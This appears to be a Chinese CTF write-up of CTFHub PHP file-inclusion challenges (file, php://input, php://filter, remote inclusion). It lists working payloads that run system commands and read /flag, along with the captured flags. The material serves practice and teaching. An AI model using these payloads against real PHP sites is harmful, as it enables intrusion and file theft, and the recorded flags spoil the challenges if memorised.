考点
php伪协议 file协议
分析过程
Shell是这个
使用hackbar 构造Playload传参
http://challenge-deb7e7e0db233e27.sandbox.ctfhub.com:10800/shell.txt
ctfhub=system('ls /');
ctfhub=system('cat /flag');
得到flag
ctfhub{3a551fa301f8dda0dccd2c7d}
php://input
考点
php伪协议 input协议
分析思路
抓包 把请求方式改成POST
开头POST /file=php://input HTTP/1.1
可以用 那没事了
playload
<?php system("ls /")?>
<?php system("cat /flag_21695")?>
得到flag
ctfhub{552db4f70a996a20ca7ae8ec}
读取源代码
考点
php伪协议中的filter协议
思路分析
他告诉了flag的位置
考虑使用filter协议
构造playload:
http://challenge-1b95d33e2212f9fb.sandbox.ctfhub.com:10800/?file=php://filter/read=convert.base64-encode/resource=/flag
解码
得到flag
ctfhub{e4be0c887bb918fc7e4c55c8}
远程包含
考点
伪协议 伪协议
思路分析
用file包含phpinfo是有回显的,所以构造
payload :
xxx:10080/?file=php://input
post <?php system('ls /');?>
<?php system('cat /flag');?>
得到flag
ctfhub{42c0e127f9a470f3f91d1eaa}